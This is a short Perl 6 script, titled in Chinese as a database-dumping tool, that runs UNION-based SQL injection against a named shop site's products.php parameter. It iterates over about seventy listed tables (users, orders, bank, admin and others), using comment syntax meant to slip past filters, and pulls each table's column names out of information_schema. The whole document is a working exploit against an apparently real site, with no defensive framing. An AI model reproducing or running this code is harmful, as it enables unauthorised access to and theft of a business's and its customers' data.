perl6 拖库脚本

#注入点:
#https://fei.sg/shop/products.php?action=content&id=-23

#check mysql column_name of the sqlinject
use HTTP::UserAgent;
use URI::Encode;

my $all_table = "db_zf,dg_activity,dg_activity_log,dg_admin,dg_announce,dg_applystore,dg_area,dg_bank,dg_bonusmode,dg_buying,dg_buyrec,dg_bwnet,dg_cashes,dg_cashesperiods,dg_cfgs,dg_city,dg_cks,dg_delta,dg_department,dg_djgs,dg_duipeng,dg_e,dg_e1,dg_editrankrecord,dg_financialdetail,dg_internaltransfer,dg_jsrec,dg_jsrec3,dg_jsrechistory,dg_logcom,dg_logistics,dg_logs,dg_mails,dg_mails1,dg_membergrade,dg_mnlogs,dg_orders,dg_orders1,dg_periods,dg_periods3,dg_product,dg_productsort,dg_province,dg_rankpower,dg_remits,dg_rks,dg_salary_note,dg_selling,dg_setting,dg_setting1,dg_setting2,dg_shangshu,dg_shangshu2,dg_share,dg_shoppingcart,dg_sms,dg_smsdy,dg_smsgroup,dg_smsgroupuser,dg_smsrec,dg_smsyset,dg_startgold,dg_tdpv,dg_tjpan,dg_tranfer,dg_tyjj,dg_tyjj1,dg_users,dg_users_copy1,dg_wangyin,dg_wangyincz,dg_wlwhf";
my @all_table = $all_table.split(',');
my %all_column;
my $ua = HTTP::UserAgent.new;
for @all_table -> $table_name {
  my $url = "https://fei.sg/shop/products.php?action=content&id=-23' union/*!12345Select*/1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*!12345from*/information_schema.columns where table_name='"~$table_name~"'-- -";
  $url = uri_encode($url);
  my $content = $ua.get($url);
  my $column = $content.content;
  $column ~~ /buy_content_text_a1\"\>(.*?)\<\/h1\>/;
  my @arra = $0.split(',');
  %all_column{$table_name} = @arra.unique;
  say $table_name ~ ' -> ' ~ @arra.unique;
}
for %all_column.keys -> $key {
  say $key ~" => "~%all_column{$key};
}